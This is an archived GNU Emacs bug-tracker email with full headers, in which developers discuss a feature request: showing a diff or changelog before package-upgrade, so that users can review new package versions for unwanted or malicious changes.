From mboxrd@z Thu Jan 1 00:00:00 1970 Path: news.gmane.io!.POSTED.blaine.gmane.org!not-for-mail From: Ship Mints Newsgroups: gmane.emacs.bugs Subject: bug#74604: 30.0.92; FR: M-x package-upgrade - offer an option to show a diff on upgrade Date: Mon, 2 Dec 2024 07:04:24 -0500 Message-ID: References: <87h67quk0g.fsf@daniel-mendler.de> <87zflfqct7.fsf@posteo.net> <87r06qqx3z.fsf@posteo.net> Mime-Version: 1.0 Content-Type: multipart/alternative; boundary="00000000000026c4c80628485b6b" Injection-Info: ciao.gmane.io; posting-host="blaine.gmane.org:116.202.254.214"; logging-data="11741"; mail-complaints-to="usenet@ciao.gmane.io" Cc: Daniel Mendler , 74604@debbugs.gnu.org To: Philip Kaludercic Original-X-From: bug-gnu-emacs-bounces+geb-bug-gnu-emacs=m.gmane-mx.org@gnu.org Mon Dec 02 13:07:44 2024 Return-path: Envelope-to: geb-bug-gnu-emacs@m.gmane-mx.org Original-Received: from lists.gnu.org ([209.51.188.17]) by ciao.gmane.io with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.92) (envelope-from ) id 1tI5DK-0002pj-EW for geb-bug-gnu-emacs@m.gmane-mx.org; Mon, 02 Dec 2024 13:07:42 +0100 Original-Received: from localhost ([::1] helo=lists1p.gnu.org) by lists.gnu.org with esmtp (Exim 4.90_1) (envelope-from ) id 1tI5D3-0000ns-TB; Mon, 02 Dec 2024 07:07:26 -0500 Original-Received: from eggs.gnu.org ([2001:470:142:3::10]) by lists.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_256_GCM_SHA384:256) (Exim 4.90_1) (envelope-from ) id 1tI5Cw-0000lU-BV for bug-gnu-emacs@gnu.org; Mon, 02 Dec 2024 07:07:21 -0500 Original-Received: from debbugs.gnu.org ([2001:470:142:5::43]) by eggs.gnu.org with esmtps (TLS1.2:ECDHE_RSA_AES_128_GCM_SHA256:128) (Exim 4.90_1) (envelope-from ) id 1tI5Cg-0006G3-0w for bug-gnu-emacs@gnu.org; Mon, 02 Dec 2024 07:07:12 -0500 DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=debbugs.gnu.org; s=debbugs-gnu-org; h=Date:From:In-Reply-To:References:MIME-Version:To:Subject; bh=znozZYFEyjDfo4Cbxj5WvkzPk2XLWcfkMs8kKfioQng=; b=n47Ir/3joJWWA5lebnw66WN9AyL+wCaE8EczT83vpxUMp5sScslDjiJ8eed9MpbAttqXtDFNtQw6ddXbDtT42/eEgEoPbuXsoVu3V8DFz/CRAo/0bb+ljmV+vf8a0Eanz2TPDftAlEiB/jpTF34yHks0a+p6w2IrV66yBBcx3R2nUgHe4Rvw6EyYNnWGYnwDQIpM7z9yFkAXoqIc7vC6ZTGo9YP4z2c87QWosQlo/Z/xjcUHywTshVF521gCq1GwBwxwBPvcn8bzQq64C1fyqo7yhFX7v5iiHKUzam4Kc8v9x8EirJJsu/oYpaRljAdn+xnPZTeOyPCDtzgDr6dHoA==; Original-Received: from Debian-debbugs by debbugs.gnu.org with local (Exim 4.84_2) (envelope-from ) id 1tI5Cf-00044v-Q9 for bug-gnu-emacs@gnu.org; Mon, 02 Dec 2024 07:07:01 -0500 X-Loop: help-debbugs@gnu.org Resent-From: Ship Mints Original-Sender: "Debbugs-submit" Resent-CC: bug-gnu-emacs@gnu.org Resent-Date: Mon, 02 Dec 2024 12:07:01 +0000 Resent-Message-ID: Resent-Sender: help-debbugs@gnu.org X-GNU-PR-Message: followup 74604 X-GNU-PR-Package: emacs Original-Received: via spool by 74604-submit@debbugs.gnu.org id=B74604.173314116115559 (code B ref 74604); Mon, 02 Dec 2024 12:07:01 +0000 Original-Received: (at 74604) by debbugs.gnu.org; 2 Dec 2024 12:06:01 +0000 Original-Received: from localhost ([127.0.0.1]:54498 helo=debbugs.gnu.org) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1tI5Bh-00042e-8x for submit@debbugs.gnu.org; Mon, 02 Dec 2024 07:06:01 -0500 Original-Received: from mail-oa1-f53.google.com ([209.85.160.53]:46163) by debbugs.gnu.org with esmtp (Exim 4.84_2) (envelope-from ) id 1tI5Be-00042D-BW for 74604@debbugs.gnu.org; Mon, 02 Dec 2024 07:05:59 -0500 Original-Received: by mail-oa1-f53.google.com with SMTP id 586e51a60fabf-29e52a97a90so633264fac.0 for <74604@debbugs.gnu.org>; Mon, 02 Dec 2024 04:05:58 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20230601; t=1733141092; x=1733745892; darn=debbugs.gnu.org; h=cc:to:subject:message-id:date:from:in-reply-to:references :mime-version:from:to:cc:subject:date:message-id:reply-to; bh=znozZYFEyjDfo4Cbxj5WvkzPk2XLWcfkMs8kKfioQng=; b=fX9PXaIs7MfBedZ6D5itMwFqbDArNl1WfSuL0KB3a7XMpG5AUaIggL5AangpDWs05A pM9SGP/CzEthN4IMlJyImg/Tx9eUJHaC+aga2PfofS3JCT9K7J7bO7WgNoECMHNGg9VH cPfMaHA8VIJQUSjPctYPWIWPjDIsQMvOq04LE/HoWkapMFU+iPUiGRW6ADHR8hX9QxO8 Adb8/htRRV3voppTh8XG95W4TSOYG0kVpPzBFLpi/bxAWMPIrvRQbe1UWcxhEkmiEXAU 8xBm35NlBzI5kaZW1s+bQtM4jT9xw/JF9v/6E7VxhbH8GuGHCgrJsWd3im90i9UdXKeX WotA== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20230601; t=1733141092; x=1733745892; h=cc:to:subject:message-id:date:from:in-reply-to:references :mime-version:x-gm-message-state:from:to:cc:subject:date:message-id :reply-to; bh=znozZYFEyjDfo4Cbxj5WvkzPk2XLWcfkMs8kKfioQng=; b=NMNgtFrCrH3vUwfMfV5jO2g9TV9C4SFvSYP7Mh6ZJ9GGt+P0kO7J2Lcpg7TmRIPRC+ xZDE80NOCnMPLRjL8mPT2a6e2r1UaLS+GSwMWXmkl89ibBO1tC7DYzxdwETkj0Icz3tx DUjxuYPyD3QKFSprQB/DJmllfGd/RwnKFIxnanD++Y/2+hBjZkN6FIwfAtXb1keR9r0M HLVqwAzndc7/ZFU/XlUwGHRZtWkLyxFz0miz1arxQf4nEIItwfVjTzWY81kAVtYkm9DK okzYPKFXvN7Q9JW31R46nVRCExQ8GCVsRoDELQu+wnd7REI63FUkh5WIy4o0nf4wDLA8 Xhpg== X-Forwarded-Encrypted: i=1; AJvYcCXPIBM6ltDuDXpDruIZt0lbEPIIqN9YdyScCRgaFIfKSSHVjwx1OJ7qnWV6mUsCd+gfZ8zZ1w==@debbugs.gnu.org X-Gm-Message-State: AOJu0YwT78WqH9v3mNzD18dzyU2KvIWKROLFkk1rQN76vLwoQwDxtgB6 tjnTAS3JoUjkcRblmxWEoMuDHLrkMLSWV/StwbwjZ/viXARlKtnZdGU+dkFTXIkdu4Nn0ezcF1X Zzkmv1s1GgkHRagwdm+HXUBQ3Mis= X-Gm-Gg: ASbGncvgvSohTszDtCUsIdc65gISyZG4k3LCJWpMhusrYBBBvnDEVanQeRySu57MCCx BEh2HA5VP7diobd1t4zHW9iT7YUAhhbs= X-Google-Smtp-Source: AGHT+IHiJv0Ns5rtVWixosGfNsmOtH6CZgQKk1kBd59NQQTPHq6xcQdTej042Bsk0qdljPbp0nHJ2tH9qZsn7w00esg= X-Received: by 2002:a05:6359:459b:b0:1c5:e2f3:bb1d with SMTP id e5c5f4694b2df-1cab15a6626mr678597155d.4.1733141092285; Mon, 02 Dec 2024 04:04:52 -0800 (PST) In-Reply-To: <87r06qqx3z.fsf@posteo.net> X-BeenThere: debbugs-submit@debbugs.gnu.org X-Mailman-Version: 2.1.18 Precedence: list X-BeenThere: bug-gnu-emacs@gnu.org List-Id: "Bug reports for GNU Emacs, the Swiss army knife of text editors" List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , Errors-To: bug-gnu-emacs-bounces+geb-bug-gnu-emacs=m.gmane-mx.org@gnu.org Original-Sender: bug-gnu-emacs-bounces+geb-bug-gnu-emacs=m.gmane-mx.org@gnu.org Xref: news.gmane.io gmane.emacs.bugs:296311 Archived-At: --00000000000026c4c80628485b6b Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: quoted-printable Isn't it the case that describe-package works only on installed packages, not prospectively installed packages? To help determine the value/risk of a package install or update, I'd think it better to show this in advance. Daniel's diff suggestion is similar but more technical. On Mon, Dec 2, 2024 at 3:59=E2=80=AFAM Philip Kaludercic wrote: > Ship Mints writes: > > > I like this idea, too. I spend a reasonable amount of time trying to > > understand what people have changed and if it will affect me negatively > > (the defensive part) or positively (for new features, user options, > > deprecations). Showing a source-code diff may be a bit technical for so= me > > users, though. I wonder if there could be either a link to a changelog, > or > > a way to encourage a changelog convention so one could be displayed for > > users prior to a decision to update a package. > > Note that packages can distribute this information. Currently, if a > tarball includes a "news" file, it will be displayed by > `describe-package. IIRC no package archive generates these right now. > But if we implement a user option like that described above (or below?), > then we can add that as an option as well. > > The main issue is that not all package maintainers ensure that there are > changelog/news sources that ELPA could use to provide this information. > > > -Stephane > > > > On Sun, Dec 1, 2024 at 5:06=E2=80=AFPM Philip Kaludercic > wrote: > > > >> Daniel Mendler writes: > >> > >> > This is a feature request for the security wishlist. When upgrading > >> > package it would be good to show a diff between the new and old > package > >> > files. Such an option could help performing review casually as part = of > >> > the upgrade process and may improve the security of the package > >> > archives. More eyes would look at new package versions. This would > make > >> > it harder to inject malicious code either via the source repository = or > >> > via attacks on the package archives. > >> > >> That sounds like a good option to have! I'll look into adding somethi= ng > >> like this via a user option that adjusts how to confirm a package > upgrade. > >> > >> Note that package-vc has something similar with the > >> `package-vc-log-incoming' command. > >> > >> > >> > >> > --00000000000026c4c80628485b6b Content-Type: text/html; charset="UTF-8" Content-Transfer-Encoding: quoted-printable
Isn't it the case that describe-package works only on installed pack= ages, not prospectively installed packages? To help determine the value/ris= k of a package install or update, I'd think it better to show this in a= dvance. Daniel's diff suggestion is similar but more technical.

On= Mon, Dec 2, 2024 at 3:59=E2=80=AFAM Philip Kaludercic <philipk@posteo.net> wrote:
Ship Mints <shipmints@gmail.com> writes:
> I like this idea, too. I spend a reasonable amount of time trying to > understand what people have changed and if it will affect me negativel= y
> (the defensive part) or positively (for new features, user options, > deprecations). Showing a source-code diff may be a bit technical for s= ome
> users, though. I wonder if there could be either a link to a changelog= , or
> a way to encourage a changelog convention so one could be displayed fo= r
> users prior to a decision to update a package.

Note that packages can distribute this information.=C2=A0 Currently, if a tarball includes a "news" file, it will be displayed by
`describe-package.=C2=A0 IIRC no package archive generates these right now.=
But if we implement a user option like that described above (or below?), then we can add that as an option as well.

The main issue is that not all package maintainers ensure that there are changelog/news sources that ELPA could use to provide this information.

> -Stephane
>
> On Sun, Dec 1, 2024 at 5:06=E2=80=AFPM Philip Kaludercic <philipk@posteo.net>= wrote:
>
>> Daniel Mendler <mail@daniel-mendler.de> writes:
>>
>> > This is a feature request for the security wishlist. When upg= rading
>> > package it would be good to show a diff between the new and o= ld package
>> > files. Such an option could help performing review casually a= s part of
>> > the upgrade process and may improve the security of the packa= ge
>> > archives. More eyes would look at new package versions. This = would make
>> > it harder to inject malicious code either via the source repo= sitory or
>> > via attacks on the package archives.
>>
>> That sounds like a good option to have!=C2=A0 I'll look into a= dding something
>> like this via a user option that adjusts how to confirm a package = upgrade.
>>
>> Note that package-vc has something similar with the
>> `package-vc-log-incoming' command.
>>
>>
>>
>>
--00000000000026c4c80628485b6b--